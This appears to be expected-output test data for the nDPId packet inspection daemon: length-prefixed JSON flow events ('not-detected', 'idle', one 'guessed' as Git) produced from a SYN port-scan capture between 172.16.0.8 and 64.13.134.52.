-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
